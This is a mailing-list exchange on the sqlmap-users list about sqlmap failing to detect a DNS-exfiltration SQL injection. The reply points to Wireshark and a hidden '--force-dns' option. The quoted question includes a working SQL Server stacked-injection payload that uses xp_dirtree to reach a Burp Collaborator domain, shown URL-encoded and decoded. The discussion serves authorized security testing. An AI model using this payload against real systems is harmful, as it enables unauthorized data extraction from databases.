I would suggest you to run the wireshark or similar when running the
--dns-domain to properly debug what is going on. There could be really lots
of problems before you fine tune it (e.g. other service running on :53).
About the "forcing" sqlmap for using dns-exfil. It will always at least try
to test it at the start of a run (if other injection technique available).
Also, it will prefer other "faster" techniques (ERROR and UNION) over
dns-exfil. However, there is a hidden switch "--force-dns" which will force
the usage of dns-exfil even if ERROR/UNION are available.
As said, the best advice I can give to you is to run the wireshark during
the run and really see what is going on.
Bye
On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:
> I have a situation where Burp has detected the following DNS exfiltration
> injection for a query parameter in a web app:
>
>
> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q
> %20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.
> dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>
>
> To make that a little easier to read, the injected value is:
>
>
> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
> lo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>
>
> I've modified the domain and verified that I receive the DNS requests on
> my local DNS server (the domain which I provide to sqlmap using the
> --dns-domain=xxx option) when the injection is manually sent to the page.
> The problem is, when I pass the request to sqlmap it's not detecting that
> there's an injection at all. I've provided the OS/DBMS and --level 5, but
> still no dice. I'm using sqlmap v1.0.12#stable.
>
>
> Since I've gotten many other injections to work in the past, I believe
> that I'm using sqlmap properly (formatting my request in a file
> appropriately, specifying the correct parameter to test, etc.) However, it
> surprised me that what appeared to be a fairly straight-forward stacked SQL
> injection would slip by all of sqlmap's tests. Is there a way to force
> sqlmap to try DNS exfiltration injections despite no other injection
> technique succeeding?
>
>
> Thanks
>
> V
>
>
>
>
> ------------------------------------------------------------
> ------------------
> Developer Access Program for Intel Xeon Phi Processors
> Access to Intel Xeon Phi processor-based developer platforms.
> With one year of Intel Parallel Studio XE.
> Training and support from Colfax.
> Order your platform today.http://sdm.link/intel
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
